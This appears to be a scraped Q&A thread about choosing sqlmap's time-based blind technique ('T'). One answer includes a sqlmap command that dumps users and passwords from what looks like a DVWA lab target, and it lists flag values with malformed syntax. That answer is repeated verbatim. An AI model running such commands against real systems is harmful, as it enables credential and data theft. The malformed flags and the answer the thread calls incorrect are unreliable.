In sqlmap I want to use time-based blind sqli technique. --technique= comes with a default of BEUSTQ which letter should use for time based blind only?

i think u should have a cookie for sql time-based blind .

For example tihs

sqlmap -u 'http://192.168.85.129/vulnerabilities/sqli_blind/?id=&Submit=Submit' --cookie="PHPSESSID=1k37fvfqn08c82ua7qrgvp3su4; security=low" --dump --users --passwords

or this is for --technique=BEUSTQ .

--banner --technique=BEUSTQ --level=1,2,3,4,5 

GET and POST parameters are always tested, HTTP Cookie header values are tested from level 2 HTTP User-Agent/Referer headers' value is tested from level 3. --risk=1,2,3,4 The default value is 1 which is innocuous for the majority of SQL injection points. Risk value 2 adds to the default level the tests for heavy query time-based SQL injections and value 3 adds also OR- based SQL injection tests. --second-order=visible_page_url Injection

Accepted answer seems incorrect from my point of view. For a time based blind SQL injection, you should use letter T, for example --technique=T .

The list of techniques with its letters is as follows:

• B: Boolean-based blind
• E: Error-based
• U: Union query-based
• S: Stacked queries
• T: Time-based blind
• Q: Inline queries

i think u should have a cookie for sql time-based blind .

For example tihs

sqlmap -u 'http://192.168.85.129/vulnerabilities/sqli_blind/?id=&Submit=Submit' --cookie="PHPSESSID=1k37fvfqn08c82ua7qrgvp3su4; security=low" --dump --users --passwords

or this is for --technique=BEUSTQ .

--banner --technique=BEUSTQ --level=1,2,3,4,5 

GET and POST parameters are always tested, HTTP Cookie header values are tested from level 2 HTTP User-Agent/Referer headers' value is tested from level 3. --risk=1,2,3,4 The default value is 1 which is innocuous for the majority of SQL injection points. Risk value 2 adds to the default level the tests for heavy query time-based SQL injections and value 3 adds also OR- based SQL injection tests. --second-order=visible_page_url Injection